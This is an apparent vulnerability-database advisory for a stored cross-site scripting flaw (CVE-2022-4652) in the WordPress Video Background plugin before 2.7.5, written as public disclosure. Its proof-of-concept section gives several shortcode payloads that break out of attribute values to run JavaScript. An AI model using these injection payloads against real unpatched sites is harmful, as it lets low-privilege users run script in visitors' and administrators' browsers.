Video Background < 2.7.5 – Contributor+ Stored XSS via Shortcode | CVE 2022-4652 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

v < 2.7.5
[vidbg loop="1});alert(/XSS-loop/); $().vidbg({a:2"]

Other affected attributes (same payload): overlay, tap_to_unmute

v < 2.7.4
[vidbg container="body'); alert(1); $('"]
[vidbg mp4="'});alert(/XSS-mp4/); $('').vidbg({a:'"]
[vidbg loop="1});alert(/XSS-loop/); $().vidbg({a:2"]

All of the shortcode attributes are affected (ie container, mp4, webm, poster, loop, muted, overlay, overlay_color, overlay_alpha, tap_to_unmute, source)

Affects Plugins

video-background

Fixed in 2.7.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

ebf3df99-6939-4ae9-ad55-004f33c1cfbc

Timeline

Publicly Published

2023-02-20 (about 1 years ago)

Added

2023-02-20 (about 1 years ago)

Last Updated

2023-03-09 (about 1 years ago)

Other

Published

Title

Published

2023-11-29

Title

Event post < 5.9.1 - Contributor+ Stored XSS

Published

2014-08-01

Title

Easy Banners 1.4 - Cross-Site Scripting (XSS)

Published

2023-02-14

Title

Opt-Out for Google Analytics < 2.3.5 - Admin+ Stored XSS

Published

2021-11-11

Title

Starter Templates < 2.7.1 - Contributor+ Block Import to Stored XSS

Published

2024-02-12

Title

MyWaze <= 1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode